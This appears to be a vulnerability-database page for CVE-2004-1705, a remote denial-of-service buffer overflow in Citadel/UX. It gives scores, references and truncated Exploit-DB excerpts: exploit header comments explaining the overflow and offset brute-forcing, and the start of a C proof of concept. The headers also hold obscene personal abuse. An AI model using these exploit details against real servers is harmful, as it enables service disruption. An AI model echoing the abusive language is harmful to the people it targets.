CVE-2004-1705
published 2004-07-30
CVE-2004-1705: Buffer overflow in Citadel/UX 6.23 and earlier allows remote attackers to cause a denial of service via a long username.
Priority: P4 24 | medium | 5 (CVSS 2.0)
CVSS vector: AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 4.92% (91.0th percentile)
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| citadel | ux | — | — |
| citadel | ux | — | — |
| citadel | ux | — | — |
| citadel | ux | — | — |
| citadel | ux | — | — |
No detection rules found.
Exploit-DB
Citadel/UX 6.23 - Remote USER Directive
exploitdb·2004-09-09
---
/*
Citadel/UX remote exploit
By nebunu: pppppppal at yahoo dot com
This is the version which contains targets, abuse it kiddies
Bruteforce:
You only have 4096/4=1024 tries.
The magic offset lies about 2048 + or - 4,8,16....256
So practically speaking you have maximum 256 tries.
Greetings: DrBIOS, Bagabontu, rebel, R4X and all the friends I have.
F goes to: #rosec @ undernet, www rosec info read and laugh
lacroix you are a big lamer, a little script kiddie who wants to gain fame on vortex.pulltheplug
wargame server. By the way, you pathetic cunt.. have you even hacked into a box other than yours?
Mad anal fucks goes to all #rosec members, don't forget their moms.
My little private message:
Let us shove dicks down the throats of you people on irc.apropo.ro, especially
Exploit-DB
Citadel/UX - Remote Buffer Overflow
exploitdb·2004-08-30
---
/*
Citadel/UX remote exploit
By nebunu: pppppppal at yahoo dot com
home.ro lamerz erased my [email protected] address for hosting exploits there..
Citadel/UX is a very well known client/server messaging for BBS which runs on port 504 by default.
It has been discovered that it suffers from a buffer overflow when USER is sent.
The bug was discovered by CoKi, who wrote a PoC denial of service exploit.
I downloaded the source code and performed an audit. The vulnerable function lies in
user_ops.c and it is called getuser(). The legal size of a user string is only 64 characters.
When 97 characters are entered then EIP is overwritten and a DoS occurs.
The exploitation is not possible in the trivial way, because of the tolower() function that makes
ineffective any
Exploit-DB
Citadel/UX - Remote Denial of Service (PoC)
exploitdb·2004-08-02
---
/* citadel_dos.c
*
* Citadel/UX Remote DoS exploit (Proof of Concept)
*
* Tested in Slackware 9.0.0 / 9.1.0 / 10.0.0
*
* by CoKi
* No System Group - http://www.nosystem.com.ar
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define BUFFERSIZE 96+1
#define ERROR -1
#define TIMEOUT 3
#define PORT 504
int connect_timeout(int sfd, struct sockaddr *serv_addr,
socklen_t addrlen, int timeout);
void use(char *program);
int main(int argc, char *argv[]) {
char buffer[BUFFERSIZE], *p, temp[BUFFERSIZE];
int sockfd;
struct hostent *he;
struct sockaddr_in dest_dir;
if(argc != 2) use(argv[0]);
p = buffer;
printf("\n Citadel/UX Remote DoS exploit (Proof of Concept)\n");
printf(" by CoKi \n\n");
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=109121546120575&w=2
http://marc.info/?l=bugtraq&m=109146099404071&w=2
http://secunia.com/advisories/12197
http://securitytracker.com/id?1010809
http://www.nosystem.com.ar/advisories/advisory-04.txt
http://www.securityfocus.com/bid/10833
https://exchange.xforce.ibmcloud.com/vulnerabilities/16840
2004-07-30
Published